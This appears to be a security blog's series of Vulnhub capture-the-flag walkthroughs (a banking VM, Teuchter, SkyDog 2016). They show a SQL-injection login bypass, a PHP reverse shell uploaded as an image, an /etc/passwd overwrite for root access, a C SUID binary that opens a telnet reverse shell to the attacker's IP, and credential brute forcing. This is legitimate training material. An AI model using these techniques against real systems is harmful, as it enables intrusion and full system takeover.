[22:49:03] [INFO] (custom) POST parameter '#1*' seems to be 'MySQL >= 5.0.12 RLIKE time-based blind (SELECT)' injectable 

Fuzzing with Burp Intruder shows me that certain keywords appear to be filtered such as ‘AND’ and ‘OR’.

Perhaps we can bypass the login?

Statements such as ‘ OR ‘a’=’a’ would not work based on the keyword filtering. Special characters appeared to be filtered as well. Many many fuzzing attempts and I finally was able to log in directly with the following string: ‘%20#;–%20- which would be the following without the URL encoding:

' #;-- -

Basically, the single quote would force bypass the password check and log me in directly as the first user in the database by executing a query such as this:

"SELECT * FROM users WHERE username='$username' AND password='$password'"

but terminating after the username check and commenting out the remainder of the query. All you actually need was the ‘%20# as the remainder after the # would be superfluous.

I tried to upload a .php file but received the following error:

OK, lets try with a jpg file. I grabbed a php reverse shell and renamed it with a jpg extension and the system seemed to like it:

The page source gave me the location of the file:

I started a netcat listener and browsed to the file located at:

http://192.168.253.136:8008/unisxcudkqjydw/vulnbank/client/view_file.php?filename=albania.jpg

I got a hit right away, used Python to grab a proper tty (Python 2 was missing from the system):

root@mrb3n:/var/www/html# nc -lvnp 8443
listening on [any] 8443 ...
connect to [192.168.253.134] from (UNKNOWN) [192.168.253.136] 37742
Linux hackday 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 23:19:42 up 16 min,  0 users,  load average: 0.00, 0.01, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

www-data@hackday:/$

Ok, we’re in. Taking a look around the system I see one user ‘taviso’ with an empty home directory:

cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
…………………..snip………………………………………
taviso:x:1000:1000:Taviso,,,:/home/taviso:/bin/bash

All of the files in /var/www/html are owned by this user and the account is in the sudo group so it must be significant:

www-data@hackday:/tmp$ cat /etc/group | grep taviso
cat /etc/group | grep taviso
adm:x:4:syslog,taviso
cdrom:x:24:taviso
sudo:x:27:taviso
dip:x:30:taviso
plugdev:x:46:taviso
lxd:x:110:taviso
taviso:x:1000:
lpadmin:x:117:taviso
sambashare:x:118:taviso

I found a the MySQL DB root password in the config.php file but that did not work either did any of the passwords in the database. I fired off SSH brute-forcing with Hydra and the ‘taviso’ user and went about my enumeration.

A search for world-writeable files showed that /etc/passwd was writeable.

www-data@hackday:/tmp$ find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
< / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null                   
/etc/passwd
.........snip.........

Well, I should be able to edit this file and either set a new root password, add a  user or change this user’s password. Let’s change taviso’s password.

I first use Python to generate a password hash:

root@mrb3n:/var/www/html# python -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'
$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1

I then grabbed the /etc/passwd file and created a quick shell script offline that would just echo out the contents of the file without losing any special characters:

root@mrb3n:/var/www/html# cat passwd.sh 
cat << "EOF"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

EOF

I pulled it over to the host and gave the script executable permissions:

wget http://192.168.253.134/passwd.sh
--2016-11-21 16:06:57--  http://192.168.253.134/passwd.sh
Connecting to 192.168.253.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1734 (1.7K) [text/x-sh]
Saving to: 'passwd.sh'

passwd.sh           100%[===================>]   1.69K  --.-KB/s    in 0s      

2016-11-21 16:06:57 (385 MB/s) - 'passwd.sh' saved [1734/1734]


www-data@hackday:/tmp$ chmod +x passwd.sh
chmod +x passwd.sh

I ran the script to overwrite the contents of /etc/passwd with the modified version I created offline:

www-data@hackday:/tmp$ ./passwd.sh > /etc/passwd
./passwd.sh > /etc/passwd

Verifying the new file was created properly:

www-data@hackday:/tmp$ cat /etc/passwd
cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
taviso:$6$salt$d9rCwkOO7qBIxkmAxy8HuXK8psJJ3m.V2YrQnH6KAJv7FNXShZFJTo9gNwlnU6oqqfEGI.ACFzg3JIe5zjk4t1:1000:1000:Taviso,,,:/home/taviso:/bin/bash

Now I should be able to su to the user ‘taviso’ and from there elevate to root.

www-data@hackday:/tmp$ su taviso
su taviso
Password: pass123

taviso@hackday:/tmp$

Cool, that worked. Now we verify our sudo permissions for laughs. The user can perform any actions as root. Score!

taviso@hackday:/tmp$ sudo -l
[sudo] password for taviso: 
Matching Defaults entries for taviso on hackday:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User taviso may run the following commands on hackday:
    (ALL : ALL) ALL

Now we just su to root and grab our prize:

taviso@hackday:/tmp$ sudo su
sudo su
[sudo] password for taviso: pass123


root@hackday:/tmp#

And the flag:

root@hackday:~# cat flag.txt
cat flag.txt
Urime, 
Tani nis raportin!

d5ed38fdbf28bc4e58be142cf5a17cf5

Google translate told me the flag text translates to “Congratulations, now the report begins.”

The md5 was a hash of “rio”.

Now for the heck of it I could SSH in directly as the ‘taviso’ user and have a further look around.

root@mrb3n:~# ssh taviso@192.168.253.138
taviso@192.168.253.138's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

6 packages can be updated.
2 updates are security updates.


Last login: Sat Oct 29 23:07:00 2016
taviso@hackday:~$ sudo su
[sudo] password for taviso: 
root@hackday:/home/taviso

Here is the function in config.php responsible for the authentication bypass. Sanitize  your input!

function check_login($username,$password){
	
	

	$username = str_ireplace("OR", "", $username);
	$username = str_ireplace("UNION", "", $username);
	$username = str_ireplace("AND", "", $username);
	$password = str_ireplace("'","",$password);
	$sql_query = "SELECT ID FROM klienti where `username` = '$username' and `password` = '$password';";
	$result = mysqli_fetch_assoc(execute_query($sql_query));
	$result = $result["ID"];
	if($result >= 1){
		return $result;
	}else{
		return -1;
		}

And the MySQL credentials in cleartext in the config.php file:

function execute_query($sql){


	$db_host = "127.0.0.1";
	$db_name = "bank_database";
	$db_user = "root";
	$db_password = "NuCiGoGo321";

Enjoyable VM with a privilege escalation method I hadn’t seen on Vulhub yet. Thanks to r_73en for putting it together and sharing as well as  @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Teuchter vulnhub walkthrough

When knightmare asked me to test his latest boot2root based around Scottish culture/slang I jumped at the opportunity. Having chatted quite a bit and debugging issues on other VMs I had already picked up several colorful Scottish expressions but boy was I in for a ride!

Gaun yersel!!!

Image result for irn bru

You can grab the VM here: https://www.vulnhub.com/entry/teuchter-03,163/

As always I imported the VM and fired off an nmap scan. This one only gave me port 80 to work with.

Hitting the web server I was greeted by Willie from the Simpsons telling me to stay out of his server, we’ll see about that.

I checked the page source and noted down several hints including possible usernames and directories.

Images will open doors. Perhaps some stego or exif madness? I grabbed all the images down locally to have a look.

Amazing shot!

Well, the ‘flicks’ directory was forbidden:

…and the ‘telly’ directory gave me more clues (and confusion):

More hints. At this point my head was spinning!

 

Focusing on the phpinfo hint I tried browsing to /flicks/phpinfo.php but that would be too easy. Firing off Burp intruder with a list of known file extensions finally got me a hit for phpinfo.pht. Nice troll.

The clue about images opening doors made me think I was looking for some sort of backdoor. I re-scanned to see if any additional ports had opened.  Googling for “php backdoors” gave me this link as the first hit: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html.

Sure enough I was able to use this technique to gain command execution:

I uploaded a PHP reverse shell but could not get it working (I’d come to find out why later on).

Turning to this great reverse shell cheat sheet I decided to use the trust mknod technique to fire myself a reverse shell.

Ok, now we’re in as www-data:

I was stuck here for quite some time, after much enumeration I took a look for SUID files and came up with a txt file in the /home/proclaimers directory, which was strange.

The file talked about wildcards. Possible privilege escalation?

Some more enumeration turned up a hint in the login.txt file, alluding to a password hidden within an image file. I had already checked out every image though!

Well, in this case knightmare was being literal and the password was right in front of me, in the form of the filename.

Once I switched over to the jkerr user I looked around quite a bit but did not find anything useful. Taking a look at the list of users I decided to Google for who cpgrogran could be.

Based on this Wikipedia article Clair Grogan was best known as the lead singer of a band ‘Altered Images’.  After bouncing my head off the keyboard for some time, once again I had another password.

 Once switched over to the cpgrogan user I was able to browse around the home directory and found yet another reference to wild cards.

At this point I needed to gain access as one more user, ‘proclaimers’. There were a few images left and the comment ‘images open doors’ was still burned in my mind so I pulled them down via Python 3 http.server (which btw I had to use because Knightmare removed the Python2 binary… thanks for that one 🙂 )

The ‘promisedyouamiracle’ image appeared to have an interested base64 encoded string in the exif data.

The string decoded to ‘gemini’. C’mon password!

It worked! OK! Now I was in as theproclaimers, what was the next step?

Looking around forever I landed on an interesting shell script ‘numpties.sh’. The script showed why I had trouble with my PHP reverse shell as well as why I couldn’t use wget to upload anything haha. It shows us that any file named ‘semaphore’ placed in the /home/proclaimers/letterfromamerica directory would have its permissions changed to be own by root and the SUID bit set. Smells like privilege escalation. I also assumed that the shell script must be running on a cron job.

At this point I needed a simple binary that, once compiled and having the permissions/ownership changed with this cron job, could be leveraged to fire me a root shell.

This simple script did the job:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
  setuid( 0 );
  system( "mknod backpipe p; telnet 192.168.110.175 443 0<backpipe | /bin/bash 1>backpipe" );
  return 0;
}

I compiled it locally and downloaded it using Curl thanks to knightmare’s trolling.

I started up a netcat listener and waited. Not too long after I had a hit and had a root shell! Well, we all know by now that knightmare’s VMs are not over with root and this one was no exception! Onwards to the final flag…and on and on and on. More trolling, I was sweating by this time.

Eventually I got to the bottom of the rabbit hole and found a zip file with what I could only imagine would be a disk image inside.

Of course the zip was password protected and nothing worked. I went back and made a word list from everything I had seen so far. Nada! Eventually out of sheer desperation I tried ‘Teuchter’ and immediately wanted to strange knightmare through the screen.

The zip contained a virtual disk image. I tried to mount it, cut it up with strings and binwalk but nothing worked. Exploring a bit more with my shiny new root privileges gave me another hint within the crontabs file:

## So vmfs-tools package eh....?
*/5 * * * * /bin/sh /usr/local/bin/numpties.sh > /dev/null 2>&1

Some Googling showed me I could mount the disk image as a new drive and use the vmfs-tools package to explore it. I added the image as a new drive under sda2:

root@mrb3n:~/Desktop/teuch# fdisk -l

Disk /dev/sda: 30 GiB, 32212254720 bytes, 62914560 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xb2d1b90f

Device     Boot    Start      End  Sectors  Size Id Type
/dev/sda1  *        2048 60262399 60260352 28.8G 83 Linux
/dev/sda2       60264446 62912511  2648066  1.3G  5 Extended
/dev/sda5       60264448 62912511  2648064  1.3G 82 Linux swap / Solaris

I then used vmfs-fuse to mount the drive and explore it:

root@mrb3n:~/Desktop/teuch# vmfs-fuse /dev/sdb1 /mnt/teuch

root@mrb3n:~/Desktop/teuch# cd /mnt/teuch/

Red Kola? Irn Bru? More hints!

Almost there.. Check the ISO and remember password relates to the TV Advert you watched.

I took out the spaces but it’s 25 characters but the Wikipedia page will get it for you.

This was either another troll or knightmare was showing some mercy.  From all the hints I was guessing the final flag was hidden inside the glass_ch.jpg image. I could probably pull it out with steghide but I still needed a 25 character password.  After going back to the beginning and reviewing everything I had once again I came up with ‘madeinscotlandfromgirders’ as the password.

I copied the image file over to a Windows VM where I had steghide from a previous CTF and FINALLY had the “real” flag after so many “almosts”.

This was an awesome VM, a mixture of entertaining and extremely frustrating. I learned a bunch about Scottish culture and could finally decode some of the things knightmare was saying.

Thanks to knightmare for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

This glossary of Scottish slang and Jargon also came in handy: https://en.wiktionary.org/wiki/Appendix:Glossary_of_Scottish_slang_and_jargon#G

SkyDog 2016: Catch Me If You Can Vulnhub Walkthrough

A new VM was released on Vulnhub this week. I had some downtime at night while traveling for work so I grabbed the image and got to work.

https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/

The challenge is set up with 8 flags as follows:

Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”
Flag#2 – “Obscurity or Security? That is the Question”
Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”
Flag#4 – “A Good Agent is Hard to Find”
Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”
Flag#6 – “Where in the World is Frank?”
Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”
Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”

I always enjoy challenges like this with multiple flags as it helps to keep you going/on path.

I started off with an nmap scan to see what we were dealing with:

root@kali:~# nmap -A -p- -Pn --open -T4 172.16.94.136

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-11 09:08 EST
Nmap scan report for 172.16.94.136
Host is up (0.00039s latency).
Not shown: 65531 filtered ports, 1 closed port
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
443/tcp   open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after:  2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
|_  256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
MAC Address: 00:0C:29:14:57:58 (VMware)
Device type: general purpose|phone|WAP|specialized|storage-misc

A web server listening on port 80 and 443 as well as an SSH service on a non-standard port.

I went a bit out of order with the flags so the clues do not match up exactly. I checked out the SSH service first and the banner gave up a flag.

root@kali:~# ssh 172.16.94.136 -p 22222
The authenticity of host '[172.16.94.136]:22222 ([172.16.94.136]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[172.16.94.136]:22222' (ECDSA) to the list of known hosts.
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
root@172.16.94.136's password:

The flag was the MD5 of the word ‘encrypt’.

I spun my wheels for a while on the next flag, after running Burp and Dirbuster for a while and not coming up with anything new I decided to go file by file. One of the JavaScript files had an interesting comment, in Hex, which was one of the clues.

root@kali:~# curl -s http://172.16.94.136/oldIE/html5.js
/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */
/*! HTML5 Shiv v3.6 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed */
/* Source: https://github.com/aFarkas/html5shiv — No longer maintained */
.......................snip......................

Decoding the Hex with Python gave me the next flag, which was the MD5 of ‘nmap’ which must be the hint for the SSH banner flag.

root@kali:~# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b37633031333230373061306566373164353432363633653964633166356465657d".decode('hex')
'flag{7c0132070a0ef71d542663e9dc1f5dee}'
>>>

Dirbuster turned up a protected page. Browsing to it gave me an error message. My first thought was changing my user-agent. I first attempted with Burp Intruder and a large user-agent list but did not get any hits.

root@kali:~# curl -s http://172.16.94.136/personnel
ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....

Digging around for quite some time led me back to the same JavaScript file with some more interesting comments. The FBI page was expecting my UA to be IE 4.0. Super secure!

Changing my UA to IE 4.0 in Burp Repeater got me access to the FBI Portal page.

I set up a match/replace rule in Burp to make it easier to browse the site directly.

 

The FBI Portal page was all static content, but I did get the next flag (which cracked to ‘evidence’) as well as a clue “new+flag”.

Following the hint brought me to a password protected page.

Basic-auth can be brute-forced with Burp Intruder but I first needed a username. The JavaScript file from earlier gave us a user name and the login prompt states “FBI Personnel” so I followed the username format and configured Intruder to attempt a brute-force with the user ‘carl.hanratty’.

I set up Burp like so:

The username in position 1 with a ‘:’ separate and base64 encoding to properly format the payloads for basic-auth.

I used a large wordlist and eventually got a hit, the 301 redirect indicated a successful login.

I checked the string for the valid password.

root@kali:/# echo Y2FybC5oYW5yYXR0eTpHcmFjZQ== | base64 -d
carl.hanratty:Grace

I was greeted with an FBI evidence page which gave me my next flag (which cracked to ‘panam’).

As well as a PDF document that did not yield anything upon inspection.

 

As with all CTFs, I have gotten in the habit of checking images for hidden data with strings, exiftool, steghide, binwalk, etc. Running binwalk against this image file indicated the presence of something embedded. I attempted to carve it up for a while and didn’t get anywhere.

root@kali:~/Desktop/skyconCTF# binwalk -e image.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
2214320       0x21C9B0        MySQL MISAM compressed data file Version 10

I took a stab with steghide but did not have the passphrase. I eventually had a facepalm moment when trying ‘panam’. I extracted the flag.txt file and had the next flag as well as what appeared to be 2 passwords. But for what? It had to be the SSH service as the rest of the web application appeared static but I did not have user name.

root@kali:~/Desktop/skyconCTF# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@kali:~/Desktop/skyconCTF# cat flag.txt 
flag{d1e5146b171928731385eb7ea38c37b8}
=ILoveFrance

clue=iheartbrenda

Google showed that the ‘fastest man alive’ clue was potentially talking about the Flash, also known as Barry Allen. Google further turned up that Barry Allen was an alias used by Frank Abagnale in the movie to trick the FBI agent tracking him. I put together a list of potential usernames based on all the aliases I could find from the movie and tried various formats.

frank.conners
frank.abagnale
barry.allen
frankconners
frankabagnale
fconners
ballen
frankconners
frankabagnale
barryallen

Trying each of this usernames combined with ‘ILoveFrance’ and ‘iheartbrenda’ eventually got me a successful login: barryallen:iheartbrenda. Logging in got me the next flag.

root@kali:~/Desktop/skyconCTF# ssh barryallen@172.16.94.136 -p 22222
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.

/usr/bin/xauth:  file /home/barryallen/.Xauthority does not exist
barryallen@skydogconctf2016:~$ 


barryallen@skydogconctf2016:~$ ls
flag.txt  security-system.data
barryallen@skydogconctf2016:~$ cat flag.txt 
flag{bd2f6a1d5242c962a05619c56fa47ba6}

This MD5 cracked to ‘theflash’.

There was also a large zip file in the user’s home directory which I transferred off using SCP to work on locally.

barryallen@skydogconctf2016:~$ file security-system.data 
security-system.data: Zip archive data, at least v2.0 to extract


root@kali:~/Desktop/skyconCTF# scp -P 22222 barryallen@172.16.94.136:/home/barryallen/security-system.data /root/Desktop/skyconCTF
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
security-system.data                          100%   71MB  80.0MB/s   00:00

I unzipped the file and ran it through binwalk (which ended up crashing my VM) due to the size), whoops.

root@kali:~/Desktop/skyconCTF# unzip security-system.data.zip 
Archive:  security-system.data.zip
  inflating: security-system.data 

root@kali:~/Desktop/skyconCTF# binwalk -e security-system.data

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
150720        0x24CC0         Microsoft executable, portable (PE)
656418        0xA0422         Copyright string: "Copyright 1985-1998,Phoenix Technologies Ltd.All rights reserved."
819330        0xC8082         Copyright string: "Copyright (C) 2003-2014  VMware, Inc."
819369        0xC80A9         Copyright string: "Copyright (C) 1997-2000  Intel Corporation"
985388        0xF092C         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
996673        0xF3541         Copyright string: "Copyright 2000-2015 VMware, Inc."
1000211       0xF4313         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
5074944       0x4D7000        Microsoft executable, portable (PE)
5894224       0x59F050        Copyright string: "Copyright (C) Rational Systems, Inc."
6758664       0x672108        CRC32 polynomial table, little endian
7143424       0x6D0000        Microsoft executable, portable (PE)
17394939      0x1096CFB       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
19261011      0x125E653       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
.......................snip......................

The file appeared to be a memory dump. I haven’t done much forensics so I turned to Google and came up with Volatility on Kali which seems to be a go-to for analyzing memory dumps.

I got started with this guide: http://resources.infosecinstitute.com/memory-forensics-and-analysis-using-volatility/

I first had to check the image info to figure out the operating system the dump came from and set up a profile moving forward.

root@kali:~/Desktop/skyconCTF# volatility imageinfo -f security-system.data 
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/root/Desktop/skyconCTF/security-system.data)
                      PAE type : PAE
                           DTB : 0x33e000L
                          KDBG : 0x80545b60L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-10-10 22:00:50 UTC+0000
     Image local date and time : 2016-10-10 18:00:50 -0400

I next used the ‘files’ plugin and dumped out all the file names.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data filescan > files
Volatility Foundation Volatility Framework 2.5
root@kali:~/Desktop/skyconCTF# cat files | grep flag.txt 
root@kali:~/Desktop/skyconCTF# cat files | grep flag
root@kali:~/Desktop/skyconCTF# cat files | grep .txt
0x0000000005e612f8      1      0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
0x0000000

I grepped for ‘flag.txt’, ‘flag’ and just ‘.txt’ until I got several hits. Code.txt looked particularly promising. Looking at the plugin list I noticed one for checking command line history. Running it got me another Hex string.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data cmdscan
Volatility Foundation Volatility Framework 2.5
**************************************************
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt

Once again I was able to use Python to decode the Hex and grab the last flag.

root@kali:~/Desktop/skyconCTF# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b38343164643364623239623066626264383963376235626537363863646338317d".decode('hex')
'flag{841dd3db29b0fbbd89c7b5be768cdc81}'
>>> 

Flag 3 kept me stumped, I ran Wireshark and Ettercap for while since it seemed to allude to traffic sniffing, but no luck. I dug around the file system for a while and did not notice any services calling out. Eventually I took a look at the Apache configuration and found flag3 hidden inside the apache.crt file.

I decoded the base64 in Burp which gave me the MD5 of ‘personnel’. Luckily I found that page with Dirbuster or I would have been quite stuck.

This was a fun challenge and I got to play around with forensics tools a bit. I spent quite some time going through the memory dump with Volatility afterwards, really cool stuff.

Thanks to @jamesbower for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Violator vulnhub VM walkthrough

foggie

A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first 3 Droopy, Gibson and Sidney I jumped at the opportunity.

Like his other VMs it had a theme, this one being Depeche Mode themed.

You can grab a copy for yourself here: https://www.vulnhub.com/entry/violator-1,153/

When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.

Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent 🙂 ) :

  • Vince Clarke can help you with the Fast Fashion.
  • The challenge isn’t over with root. The flag is something special.
  • I have put a few trolls in, but only to sport with you.

Without further ado, here goes:

